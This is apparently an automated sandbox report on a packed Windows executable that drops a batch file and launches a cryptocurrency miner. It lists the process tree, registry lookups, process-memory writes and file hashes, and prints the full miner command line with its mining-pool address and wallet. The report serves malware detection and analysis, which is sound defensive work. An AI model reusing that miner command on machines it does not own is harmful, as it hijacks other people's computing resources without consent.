73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
297s
max time network
306s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
19/02/2024, 19:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1936	b2e.exe
4772	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4772	cpuminer-sse2.exe
4772	cpuminer-sse2.exe
4772	cpuminer-sse2.exe
4772	cpuminer-sse2.exe
4772	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3800-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3800 wrote to memory of 1936	3800	batexe.exe	83
PID 3800 wrote to memory of 1936	3800	batexe.exe	83
PID 3800 wrote to memory of 1936	3800	batexe.exe	83
PID 1936 wrote to memory of 3512	1936	b2e.exe	84
PID 1936 wrote to memory of 3512	1936	b2e.exe	84
PID 1936 wrote to memory of 3512	1936	b2e.exe	84
PID 3512 wrote to memory of 4772	3512	cmd.exe	87
PID 3512 wrote to memory of 4772	3512	cmd.exe	87

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3800
- C:\Users\Admin\AppData\Local\Temp\8E84.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\8E84.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8E84.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9422.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3512
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8E84.tmp\b2e.exe

Filesize
374KB

MD5
4218a673a6f05c3cf7ec90e643a25327

SHA1
6a309df82015937f75ece9345663207708b2ecaa

SHA256
6428d65b15f36eb9aa2c5fb998811faa7720185b8559c88b76e5775bc072c239

SHA512
febebcdbaf85a458d80bce86c5394fea2aaec02272c91ce7e6f29d42e2c904a3dee6697e59421aa30e814e8bdc534717de1c1dbdf26ff8a1c0d46fcb8ef5edf5

Download Submit
C:\Users\Admin\AppData\Local\Temp\8E84.tmp\b2e.exe

Filesize
406KB

MD5
2717a091cfaf559e3647b395b2cfe4b9

SHA1
51f2db4fa71dfbfb150512445f244a82bf79959b

SHA256
3c27b94a840302140e5f0d25eeb0b36689036a96d99021f8ad37ba75ec4052ef

SHA512
c89b085107b68319b842d92035c1b6f4bd0a769844ee2799937a39054c150e37e19b13226f5fd2fb003afe275d626c89c04a575a71869333182ce8a1d4600741

Download Submit
C:\Users\Admin\AppData\Local\Temp\8E84.tmp\b2e.exe

Filesize
380KB

MD5
a38cafb1728dd56348596a35b6a7afde

SHA1
1ffb41c28175e98a9db938aeac44b5fb1302ef39

SHA256
12556606f979a132fae0625b4c5f806f689df349cef8efc0962abff4f4ad8fd8

SHA512
c0ad38c101034cc754cf4c150544adb723a58c1f64edc60b1650a8a19064f64764fb402ca5914c23995fe53df15426ffc986baced20fa34cc662851c6ddcf756

Download Submit
C:\Users\Admin\AppData\Local\Temp\9422.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
297KB

MD5
688eff871e8ade62c4ec14b3595bc45e

SHA1
d3d061d44f5d69bc6b7b11ba3f246cb7e763f83d

SHA256
4af206ba1bbe373eba9cb2a98670e7b45a12b01c85b7b196574a043ff6e6a474

SHA512
96a90f6ddabcc06847a6f0693ad18ffb076d17b9e1a8709334dfd6d3de926778ec8c120821efadeea8b5732b56bb902f5ca03a91cfb6c8dd6360c164e666392b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
330KB

MD5
f1bb1652459af52ab6d7bd17cd7ee97e

SHA1
902cde60e5b6c28e2eae440f9b4a450eb0c44200

SHA256
273dadb0bc1a2c1afbfe58ebac8e27853ee449b57562c17e3cfdf9edc49dd983

SHA512
8fd36bf9785df1a4d7c94496c9906d73aa38b265f1bb7f71b8c6d609fbcb6ab64ecce7f86a57098f2fce005a487766c77b97541823927ef247cbc32910ee9ad8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
453KB

MD5
06e746acddc570a74edd961b9fbe88ec

SHA1
f16c8bca868355726e6f0d8df7c4a58ac328c77a

SHA256
ce579f020e824618ee9229d9fd9949652a4fbace897e138b0f15edb02f6a4454

SHA512
d187f5d896e83b0f7b62cb70c9870bf5752901178ffac5e86e27670a8153726602b47d2011e42bed306c9eb56bd4a785396f9bfc9c44854c0363675efa15ccd7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
119KB

MD5
8b7a48abab17e9ef32d68a0857843363

SHA1
7cb7eb0c4b42ee571046b90b54ecb3c6fbb6548c

SHA256
a90cb5147331bf6b13089c782bf18ae815837b8ae04b1be5e0a67390eca755f0

SHA512
e747e14a9adf884220d871a2a6b8c87365a0f44cffa65c3ec6385595d79a502876718489b1ac8e8eb1353ceac27768335f25b17c3c76de04274b52dd0fe5a523

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
122KB

MD5
daf427eecf3f83941156ba5998fe0db4

SHA1
761bdc978ca805a21017ff20cb2f1cad612b4924

SHA256
5df0bf5826c2daf2f86a8cd0d8a8783120cb06af4500cc7526344f8c92c37730

SHA512
0a866262c30ec6cb550dff555a86e7caf12b4dd8055dde87ee92528128e1079ddf00988b942d97175c192c36020c93f429df7219fea886d6590b49ee37f0bbfc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
374KB

MD5
58774f5b524a2d4bc956a1f134b356d3

SHA1
3bd80a87888e97ec5fb5b5f1dddea24704dd0547

SHA256
378e7f2cdf5978891e725efc0ae3b0453c1c445678429f1e7492de81f2de1e9a

SHA512
7352c1d77de3bc2967765dcd7adb68619f598b8d343263b6ed0251df0a2dce01682968c6d88d94e459dbad5f9e26396e7c1f23f5e7b70cf7c8e202fe147781f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
289KB

MD5
099e04a5a2c4cc0c54b44fdbde5144e6

SHA1
136f9dd55d7f950fe8c5f9d3d6a2bb80f02d11d0

SHA256
3f98c9c4af0a3a301d2eeb15c3725cfa336cc884b34ebbb02d78fd7af4675fde

SHA512
e5ad30a28720ef3da71bebc34c68b66e70a8ab1d918cad0fc072299008723b969ae88530dde2f0cd02a136c87efccf2eac28cf409a5adfe5a82e6f4685cac679

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
238KB

MD5
6fea46f465b5846534484dbb069c303f

SHA1
2e072970c56f9634eb5942f2f61c7c5f4da2da15

SHA256
a38deb2ef4f1c9ae241f7c849f15c2d69ecb1c30ee916847e8677cc77ba28ccb

SHA512
6745e11a719cf8f14a2761cf7440dc2ee86ef5dbb0863b6d733cdb668794730c8edcab00235d9bf768f4ed05c3361ad4f20a60a30d1b232f63d64842bde51880

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
114KB

MD5
1c66a02a0775e3b337fba9b7f5d2731c

SHA1
6b85a95d65dcbf89faa524e738c45fc2e0232298

SHA256
0c38384429aa00fe94e4ea8eba1b54f1882fb2d8acc84df7dacd593b1f745418

SHA512
6aa4a7b0bf967ef735e9332175134748a7c0569128a4c731677ccc8353b4c26d7c3285ddc033130d4c01bf73522ee37372e8ce6a4eb70d70d0f4c25c469f17ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
158KB

MD5
255c5a73591bb802e417e1b7ee3c3836

SHA1
44c321ec5fb75378ed24f47d8ada5095eaae2f4a

SHA256
0d590974016f36299ee4cdcacaecaca636198e6c3a1ffc5edabed8d17f60a47f

SHA512
ed5d73580443c719fea42f34d2c70509027ac38b7b007f5b0b555e6b31f587ca86e8c347f273db216cf12f926b999a0f3eb6d28af9dfa5383f67dd991a8b0e75

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
213KB

MD5
2ea895f862b9de65c6cb1f104a79e835

SHA1
b7ac31ae0a292d3d993c7d7696abac47ab0f2627

SHA256
297a1f8883f05175eaf0f7c005a69a9870773486f6181d1e1c6d3c97449b7b5a

SHA512
faa7b968884998305b993364a3282adcaf0b94f54fcb97d2c416d0b46e99e7395435dafb2c039dd77abc150561ae23584e1d843bb3963133258f70d142647611

Download Submit
memory/1936-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1936-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3800-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4772-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4772-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4772-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4772-47-0x00000000010A0000-0x0000000002955000-memory.dmp

Filesize
24.7MB

Download
memory/4772-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4772-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4772-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4772-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4772-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4772-45-0x000000006FEB0000-0x000000006FF48000-memory.dmp

Filesize
608KB

Download
memory/4772-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4772-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4772-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4772-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4772-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4772-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4772-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download